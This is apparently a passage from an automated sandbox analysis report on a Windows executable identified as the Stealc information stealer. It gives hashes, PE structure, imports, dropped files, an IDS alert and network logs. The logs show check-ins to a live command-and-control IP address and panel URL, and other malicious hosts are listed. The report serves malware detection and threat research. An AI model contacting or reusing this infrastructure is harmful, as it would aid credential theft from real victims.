                                        http://94.141.122.159/baf27292fb61e144.php3FuCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://94.141.122.159/wsuCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://94.141.122.159/baf27292fb61e144.phpGuCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              94.141.122.159
                                              unknownRussian Federation
                                              43429UNITLINE_RST_NET1RostovnaDonuRUtrue
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1542883
                                              Start date and time:2024-10-26 19:21:27 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 4m 35s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:uCEeVGAWIB.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:9a4891bcf21b6639412f96c108a27744.exe
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@2/5@0/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 23
                                              • Number of non-executed functions: 165
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • VT rate limit hit for: uCEeVGAWIB.exe
                                              TimeTypeDescription
                                              13:22:31API Interceptor1x Sleep call for process: WerFault.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              94.141.122.159ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exeGet hashmaliciousStealc, VidarBrowse
                                              • 94.141.122.159/baf27292fb61e144.php
                                              igDFR5VY1K.exeGet hashmaliciousStealcBrowse
                                              • 94.141.122.159/baf27292fb61e144.php
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              UNITLINE_RST_NET1RostovnaDonuRUZnPyVAOUBc.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                              • 94.141.122.159
                                              ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exeGet hashmaliciousStealc, VidarBrowse
                                              • 94.141.122.159
                                              igDFR5VY1K.exeGet hashmaliciousStealcBrowse
                                              • 94.141.122.159
                                              W67gX3Jo1F.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 94.141.123.114
                                              zKEylAn0Mb.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 94.141.123.114
                                              lbUCYrmjlo.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 94.141.123.114
                                              GZrCQ5cvLI.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 94.141.123.114
                                              AkPKizq7ND.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 94.141.123.114
                                              LBpAxeJkcW.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 94.141.123.114
                                              dEeSySeM1G.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 94.141.123.114
                                              No context
                                              No context
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.9634657765915392
                                              Encrypted:false
                                              SSDEEP:192:ubNRu7V0N2RuwjMhZrMZtzuiF+Z24IO8r8:UNRq2N2RDjjTzuiF+Y4IO8r
                                              MD5:C4B660A540C65BE0AABBF4619FECF26B
                                              SHA1:F36639754ED7604008820A54B53EDDCEA311A47F
                                              SHA-256:EF87C33D6AC5B5D7DCB1334AE61D38A08740894F572AE487DD74D78CFFC29B87
                                              SHA-512:6E1C26B8D2E6A42CFBD1AD3718A920102AA395D6821047D1AEA9AC10AD853B99B367C6949C3680F6CAA02D9380C28DAAE8179B080EEF93AA32DEE10A5136B59B
                                              Malicious:true
                                              Reputation:low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.3.6.9.4.7.6.4.3.4.9.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.3.6.9.4.8.6.7.4.7.4.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.5.a.c.8.a.5.-.a.6.b.d.-.4.c.1.f.-.9.3.9.7.-.2.4.3.e.5.7.5.a.8.1.3.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.b.2.5.2.0.a.-.1.8.e.5.-.4.9.c.f.-.9.2.9.8.-.f.1.1.d.d.1.9.5.7.d.f.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.C.E.e.V.G.A.W.I.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.6.0.-.0.0.0.1.-.0.0.1.5.-.2.d.4.4.-.6.1.9.d.c.b.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.4.d.f.4.b.5.c.2.5.f.6.3.e.2.5.3.1.9.e.2.8.e.3.2.4.c.c.9.6.a.b.0.0.0.0.f.f.f.f.!.0.0.0.0.7.a.7.0.5.2.5.8.6.f.6.b.3.5.e.6.b.5.5.9.4.5.2.8.a.2.b.8.4.c.a.6.2.b.b.1.4.2.1.8.!.u.C.E.e.V.G.A.W.I.B...e.x.e.....T.a.r.g.e.t.A.p.p.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Sat Oct 26 17:22:27 2024, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):60682
                                              Entropy (8bit):1.925765185935961
                                              Encrypted:false
                                              SSDEEP:192:asrXUMS+W+YXNSZOEOJw2OxBYqAJeVFaAl4pn6XOW8xye02TErMKyhnyPUIj1gmO:/S+WbEEGxBYLyFas4N6X0E2APdZXIkY
                                              MD5:2A60CEC77556276B249CB9B7703F77B5
                                              SHA1:465856915C4F8347A85828FB4C5DDEE9E0EC24D7
                                              SHA-256:AB4830CD44B2A063E641123E2966F6885666546D1D771729C5EFA84764FDBC47
                                              SHA-512:C4C61916AE5345121FE23421265C0E6DB8DCCA9E52304F9D76985191D5C2AC5AC10E2C2D75325A880543E7D2375DB214D8098EE4168A0C91F4F75008F59CDE38
                                              Malicious:false
                                              Reputation:low
                                              Preview:MDMP..a..... .......S%.g............4...............<............*..........T.......8...........T...........(3.........................................................................................................eJ......H.......GenuineIntel............T.......`...L%.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8336
                                              Entropy (8bit):3.6986500719069006
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJpV6ZnG6Y2DUSU90hgmf3WupDM89bHmsfxNm:R6lXJ76ZnG6YZSU90hgmf37HFfy
                                              MD5:1ED48308C69909C868E3FDE72FE58658
                                              SHA1:E4A5B5B0146FFA3295287A50D575BE0C8E536C75
                                              SHA-256:29626029B6641F8705F576DD4B0CC4DF78B7AB07286C1B6B8EB85E2C6806AFA7
                                              SHA-512:FAA97F6AB6700E6E825371D4E80CD18E1580C43D03E22905ED9F0BCFD9F7CEC671C702A1EAE8E8A691718455C8F5B711AE121913E767D7A3650519ED7D8203CD
                                              Malicious:false
                                              Reputation:low
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.1.2.0.<./.P.i.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4579
                                              Entropy (8bit):4.48684669478346
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zsKJg77aI9h+WpW8VYzYm8M4JKQFV+q8O5gtT8eTd:uIjfYI7j/7VrJzVo8Gd
                                              MD5:CC1B773B4DAC60FD6B30C965C9CF7954
                                              SHA1:4D00B6F860E24CD65275B094259B2712F3671522
                                              SHA-256:BF65D060BCEB6992EAE876E15A9502BB7BFC745F5292EFD4C2F1BC79C7CBFC2D
                                              SHA-512:604048F52DD42A2871E54C84ED9E8EDC61832A32721BFDC3A01F3D1AA4DBA22FB09A3084C73D0FB28B916D351FD14EE632B0B0452C011D8B5D775AC190947548
                                              Malicious:false
                                              Reputation:low
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560665" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:MS Windows registry file, NT/2000 or above
                                              Category:dropped
                                              Size (bytes):1835008
                                              Entropy (8bit):4.468594717825806
                                              Encrypted:false
                                              SSDEEP:6144:3zZfpi6ceLPx9skLmb0faZWSP3aJG8nAgeiJRMMhA2zX4WABluuNEjDH5S:jZHtaZWOKnMM6bFpuj4
                                              MD5:DB78AC8C28402108B21476082329618E
                                              SHA1:786E6F081E893DCFECE355C2493E79EC5116FEE1
                                              SHA-256:C07BC6392D88C2CFB809808AEF529F5EE656824DCA46EB1C4E7D1D012A5B3B2B
                                              SHA-512:4B2ACF9A79CFCD70A1B10CEC46ACEC74F1B21A5E2666DA9C98E010138BEB34C73D8AA38546612F59387C401D16D44828A1521B2409705BF16273C8C9A8A2BEBB
                                              Malicious:false
                                              Reputation:low
                                              Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.I..'................................................................................................................................................................................................................................................................................................................................................_.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.63302282535432
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.53%
                                              • InstallShield setup (43055/19) 0.43%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:uCEeVGAWIB.exe
                                              File size:401'408 bytes
                                              MD5:9a4891bcf21b6639412f96c108a27744
                                              SHA1:7a7052586f6b35e6b5594528a2b84ca62bb14218
                                              SHA256:4dbfa3d8eef4144e8d2d90fa3f91d14aa7f09063aa0d9b5c7a17488f93ac861e
                                              SHA512:7cdbcf3938e0e73a7b7b0e582d7dcfd052413bf34c7cfc69254ea99af393b94f3685f5f857f352da88773c5d69ef07dafda9f732995dd5f917cb74d5762cc49b
                                              SSDEEP:6144:7ZsDqOtHrjoEDNLivA/eQcuz7d9pge2GOrMRonuzfo:eD1tpDNgA2uXd/GGwMRv
                                              TLSH:99846C2162F16812EEB76B315A3B8AECE66FBC63DE3C525D61143E1F18733B18512712
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K......X...X...X..pX...X..bX...X..sX...X..eXd..X(].X...X...Xt..X..lX...X..rX...X..wX...XRich...X................PE..L...g..e...
                                              Icon Hash:151a111210901409
                                              Entrypoint:0x4016ea
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x65B8BE67 [Tue Jan 30 09:16:23 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:39ffd9968f23520e932a47c640b29e7f
                                              Instruction
                                              call 00007F7EC8B1A188h
                                              jmp 00007F7EC8B16B1Dh
                                              mov edi, edi
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 00000328h
                                              mov dword ptr [00440778h], eax
                                              mov dword ptr [00440774h], ecx
                                              mov dword ptr [00440770h], edx
                                              mov dword ptr [0044076Ch], ebx
                                              mov dword ptr [00440768h], esi
                                              mov dword ptr [00440764h], edi
                                              mov word ptr [00440790h], ss
                                              mov word ptr [00440784h], cs
                                              mov word ptr [00440760h], ds
                                              mov word ptr [0044075Ch], es
                                              mov word ptr [00440758h], fs
                                              mov word ptr [00440754h], gs
                                              pushfd
                                              pop dword ptr [00440788h]
                                              mov eax, dword ptr [ebp+00h]
                                              mov dword ptr [0044077Ch], eax
                                              mov eax, dword ptr [ebp+04h]
                                              mov dword ptr [00440780h], eax
                                              lea eax, dword ptr [ebp+08h]
                                              mov dword ptr [0044078Ch], eax
                                              mov eax, dword ptr [ebp-00000320h]
                                              mov dword ptr [004406C8h], 00010001h
                                              mov eax, dword ptr [00440780h]
                                              mov dword ptr [0044067Ch], eax
                                              mov dword ptr [00440670h], C0000409h
                                              mov dword ptr [00440674h], 00000001h
                                              mov eax, dword ptr [0043F004h]
                                              mov dword ptr [ebp-00000328h], eax
                                              mov eax, dword ptr [0043F008h]
                                              mov dword ptr [ebp-00000324h], eax
                                              call dword ptr [000000F0h]
                                              Programming Language:
                                              • [C++] VS2008 build 21022
                                              • [ASM] VS2008 build 21022
                                              • [ C ] VS2008 build 21022
                                              • [IMP] VS2005 build 50727
                                              • [RES] VS2008 build 21022
                                              • [LNK] VS2008 build 21022
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3dbfc0x3c.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x11f0000x204f0.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x1b4.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x3a37c0x3a400567556bdcce9f592fcd8a11c510891c7False0.8228817395386266data7.486368351428681IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x3c0000x25e00x260074fe167b866b3aafb68f9d9d7c2cf8d5False0.3843544407894737data5.517782620883267IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x3f0000xdf9780x4c00d04384febfcf008bd047d4ae446c1575False0.08604029605263158data1.0009507978097547IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x11f0000x1414f00x20600467a239e767ac3404bb7a1079978c34bFalse0.40899493243243246data4.906392630717915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_CURSOR0x1375e80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                              RT_CURSOR0x1377180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                              RT_ICON0x11fac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5565031982942431
                                              RT_ICON0x1209680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6304151624548736
                                              RT_ICON0x1212100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6762672811059908
                                              RT_ICON0x1218d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.736271676300578
                                              RT_ICON0x121e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5033195020746888
                                              RT_ICON0x1243e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.5968574108818011
                                              RT_ICON0x1254900x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.5926229508196721
                                              RT_ICON0x125e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7331560283687943
                                              RT_ICON0x1262f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3358208955223881
                                              RT_ICON0x1271a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.39395306859205775
                                              RT_ICON0x127a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.3957373271889401
                                              RT_ICON0x1281100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.4060693641618497
                                              RT_ICON0x1286780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.22095435684647302
                                              RT_ICON0x12ac200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.24835834896810507
                                              RT_ICON0x12bcc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.28647540983606556
                                              RT_ICON0x12c6500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.3147163120567376
                                              RT_ICON0x12cb300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39019189765458423
                                              RT_ICON0x12d9d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5464801444043321
                                              RT_ICON0x12e2800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6094470046082949
                                              RT_ICON0x12e9480x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6401734104046243
                                              RT_ICON0x12eeb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4101782363977486
                                              RT_ICON0x12ff580x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.39959016393442626
                                              RT_ICON0x1308e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.44858156028368795
                                              RT_ICON0x130db00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.34168443496801704
                                              RT_ICON0x131c580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.46254512635379064
                                              RT_ICON0x1325000x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.5057603686635944
                                              RT_ICON0x132bc80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.5216763005780347
                                              RT_ICON0x1331300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.42697095435684645
                                              RT_ICON0x1356d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.43386491557223267
                                              RT_ICON0x1367800x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.43401639344262294
                                              RT_ICON0x1371080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.449468085106383
                                              RT_STRING0x139e980x9adata0.6038961038961039
                                              RT_STRING0x139f380x6d6data0.42628571428571427
                                              RT_STRING0x13a6100x4aadata0.4455611390284757
                                              RT_STRING0x13aac00x4dcdata0.4429260450160772
                                              RT_STRING0x13afa00x7d4data0.41966067864271456
                                              RT_STRING0x13b7780x718data0.42841409691629956
                                              RT_STRING0x13be900x696data0.4359430604982206
                                              RT_STRING0x13c5280x616data0.43902439024390244
                                              RT_STRING0x13cb400x7dedata0.41807348560079444
                                              RT_STRING0x13d3200x5c6data0.4370771312584574
                                              RT_STRING0x13d8e80x5d8data0.44385026737967914
                                              RT_STRING0x13dec00x588data0.4392655367231638
                                              RT_STRING0x13e4480x616data0.43838254172015406
                                              RT_STRING0x13ea600x4eedata0.4548335974643423
                                              RT_STRING0x13ef500x5a0data0.4354166666666667
                                              RT_GROUP_CURSOR0x139cc00x22data1.0588235294117647
                                              RT_GROUP_ICON0x1375700x76dataTurkishTurkey0.6694915254237288
                                              RT_GROUP_ICON0x1262800x76dataTurkishTurkey0.6610169491525424
                                              RT_GROUP_ICON0x130d480x68dataTurkishTurkey0.7211538461538461
                                              RT_GROUP_ICON0x12cab80x76dataTurkishTurkey0.6694915254237288
                                              RT_VERSION0x139ce80x1b0data0.5856481481481481
                                              DLLImport
                                              KERNEL32.dllGetComputerNameA, GetNumaNodeProcessorMask, GetNumaProcessorNode, GetLocaleInfoA, CallNamedPipeA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, GlobalFlags, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, GetFileAttributesW, GetModuleFileNameW, GetConsoleFontSize, GetBinaryTypeW, IsBadStringPtrA, WritePrivateProfileStringW, GetStringTypeExA, LCMapStringA, GetStdHandle, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, MoveFileA, SetCommMask, GetOEMCP, BuildCommDCBA, FatalAppExitA, FindAtomW, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, CreateFileA, CloseHandle, HeapAlloc, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapSize, GetCPInfo, GetACP, IsValidCodePage, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetModuleHandleA
                                              WINHTTP.dllWinHttpOpenRequest
                                              Language of compilation systemCountry where language is spokenMap
                                              TurkishTurkey
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-10-26T19:22:28.565437+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.64971094.141.122.15980TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 26, 2024 19:22:27.375103951 CEST4971080192.168.2.694.141.122.159
                                              Oct 26, 2024 19:22:27.380599022 CEST804971094.141.122.159192.168.2.6
                                              Oct 26, 2024 19:22:27.380753040 CEST4971080192.168.2.694.141.122.159
                                              Oct 26, 2024 19:22:27.381299019 CEST4971080192.168.2.694.141.122.159
                                              Oct 26, 2024 19:22:27.386629105 CEST804971094.141.122.159192.168.2.6
                                              Oct 26, 2024 19:22:28.277149916 CEST804971094.141.122.159192.168.2.6
                                              Oct 26, 2024 19:22:28.277209044 CEST4971080192.168.2.694.141.122.159
                                              Oct 26, 2024 19:22:28.281810045 CEST4971080192.168.2.694.141.122.159
                                              Oct 26, 2024 19:22:28.287421942 CEST804971094.141.122.159192.168.2.6
                                              Oct 26, 2024 19:22:28.565334082 CEST804971094.141.122.159192.168.2.6
                                              Oct 26, 2024 19:22:28.565437078 CEST4971080192.168.2.694.141.122.159
                                              Oct 26, 2024 19:22:33.717446089 CEST804971094.141.122.159192.168.2.6
                                              Oct 26, 2024 19:22:33.717510939 CEST4971080192.168.2.694.141.122.159
                                              Oct 26, 2024 19:22:33.874041080 CEST4971080192.168.2.694.141.122.159
                                              • 94.141.122.159
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.64971094.141.122.159801120C:\Users\user\Desktop\uCEeVGAWIB.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 26, 2024 19:22:27.381299019 CEST89OUTGET / HTTP/1.1
                                              Host: 94.141.122.159
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Oct 26, 2024 19:22:28.277149916 CEST203INHTTP/1.1 200 OK
